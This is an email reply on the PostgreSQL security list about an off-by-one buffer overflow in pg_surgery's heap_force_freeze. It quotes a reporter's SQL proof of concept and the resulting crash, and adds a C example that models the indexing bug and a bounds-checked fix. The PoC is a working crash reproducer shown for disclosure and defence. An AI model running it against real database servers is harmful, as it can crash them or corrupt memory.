---Original---
From: "Noah Misch"<noah@leadboat.com>
Date: Wed, Jun 3, 2026 23:25 PM
To: "王跃林"<violin0613@tju.edu.cn>;
Cc: "security"<security@postgresql.org>;
Subject: Re: heap_force_common in contrib/pg_surgery/heap_surgery.c has an off by one stack buffer overflow

On Sat, May 23, 2026 at 11:56:59AM +0800, 王跃林 wrote:
> PoC

>  CREATE EXTENSION IF NOT EXISTS pg_surgery
>  CREATE TABLE vuln_005_t()
>  INSERT INTO vuln_005_t SELECT FROM generate_series(1, 291)
>  SELECT heap_force_freeze('vuln_005_t'::regclass,
>                           ARRAY['(0, 291)']::tid[])

>    The final statement triggers the bug.

> Results

>    The debug build crashed with:
>  TRAP: failed Assert("offno < MaxHeapTuplesPerPage"), File: "heap_surgery.c", Line: 231
>  server closed the connection unexpectedly

>    In a release build, the assertion is removed and the out of bounds
>    write remains.

Thanks for the report.  The function is superuser-only, so this is not a vuln.
Please report the overflow bug to pgsql-bugs@postgresql.org.
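As an added illustration (not PostgreSQL's code and not the actual heap_surgery.c logic), the C below models the off-by-one class the report describes: OffsetNumbers are 1-based, so an 8 kB heap page has offsets 1..291, and indexing a 291-slot array with the raw offset sends exactly the last valid offset one slot past the end. The names OffsetNumber, MaxHeapTuplesPerPage and FirstOffsetNumber mirror PostgreSQL's identifiers; the value 291 is assumed from the PoC, and the PageMarks array, the tid literal parser and every helper name are constructed for this example. The hardened path checks the computed index explicitly rather than relying on an Assert, since, as the report notes, release builds strip assertions.

```c
/* Added example: modelling the 1-based-offset vs 0-based-array off-by-one.
 * Not PostgreSQL code; MaxHeapTuplesPerPage = 291 is assumed from the report. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint16_t OffsetNumber;
#define InvalidOffsetNumber 0
#define FirstOffsetNumber 1
#define MaxHeapTuplesPerPage 291 /* 8 kB heap page, as the PoC's 291 rows imply */

/* Constructed per-page bookkeeping: one slot per possible tuple offset. */
typedef struct {
    bool seen[MaxHeapTuplesPerPage];
} PageMarks;

/* Constructed parser for the textual tid form "(blkno, offno)" used in the PoC. */
static bool parse_tid(const char *s, uint32_t *blkno, OffsetNumber *offno) {
    unsigned long b, o;
    char tail;
    if (sscanf(s, " ( %lu , %lu %c", &b, &o, &tail) != 3 || tail != ')')
        return false;
    if (b > 0xFFFFFFFFul || o > 0xFFFFul)
        return false;
    *blkno = (uint32_t) b;
    *offno = (OffsetNumber) o;
    return true;
}

/* Two ways to turn a 1-based offset into an array index. The buggy one is
 * the pattern the report describes: valid offset 291 becomes index 291. */
static int slot_index_buggy(OffsetNumber offno) { return (int) offno; }
static int slot_index_fixed(OffsetNumber offno) { return (int) offno - 1; }

static bool slot_in_bounds(int idx) {
    return idx >= 0 && idx < MaxHeapTuplesPerPage;
}

/* Audit helper: how many of the valid offsets 1..Max does a mapping send
 * out of bounds? Buggy mapping: 1 (offset 291). Fixed mapping: 0. */
static int count_oob(int (*map)(OffsetNumber)) {
    int n = 0;
    for (OffsetNumber off = FirstOffsetNumber; off <= MaxHeapTuplesPerPage; off++)
        if (!slot_in_bounds(map(off)))
            n++;
    return n;
}

/* Hardened mark: range-check the offset, then bounds-check the computed
 * index with an ordinary if, which survives NDEBUG/release builds. */
static bool mark_offset(PageMarks *m, OffsetNumber offno) {
    if (offno < FirstOffsetNumber || offno > MaxHeapTuplesPerPage)
        return false;
    int idx = slot_index_fixed(offno);
    if (!slot_in_bounds(idx))
        return false;
    m->seen[idx] = true;
    return true;
}

/* 1 = accepted and recorded, 0 = rejected as out of range, -1 = unparseable. */
static int handle_tid_literal(PageMarks *m, const char *lit) {
    uint32_t blk;
    OffsetNumber off;
    if (!parse_tid(lit, &blk, &off))
        return -1;
    (void) blk; /* block number is not needed for the offset check */
    return mark_offset(m, off) ? 1 : 0;
}

/* Convenience wrapper with a fresh PageMarks, so results are independent. */
static int check_literal(const char *lit) {
    PageMarks m;
    memset(&m, 0, sizeof m);
    return handle_tid_literal(&m, lit);
}

int main(void) {
    printf("buggy mapping: %d valid offset(s) out of bounds\n", count_oob(slot_index_buggy));
    printf("fixed mapping: %d valid offset(s) out of bounds\n", count_oob(slot_index_fixed));
    printf("(0, 291) -> %d\n", check_literal("(0, 291)")); /* accepted */
    printf("(0, 292) -> %d\n", check_literal("(0, 292)")); /* rejected */
    printf("(0, 0)   -> %d\n", check_literal("(0, 0)"));   /* rejected */
    return 0;
}
```

The audit loop is the useful part for a reviewer: enumerating every valid offset against the index mapping pinpoints the single boundary value that a `<` check on the raw offset lets through.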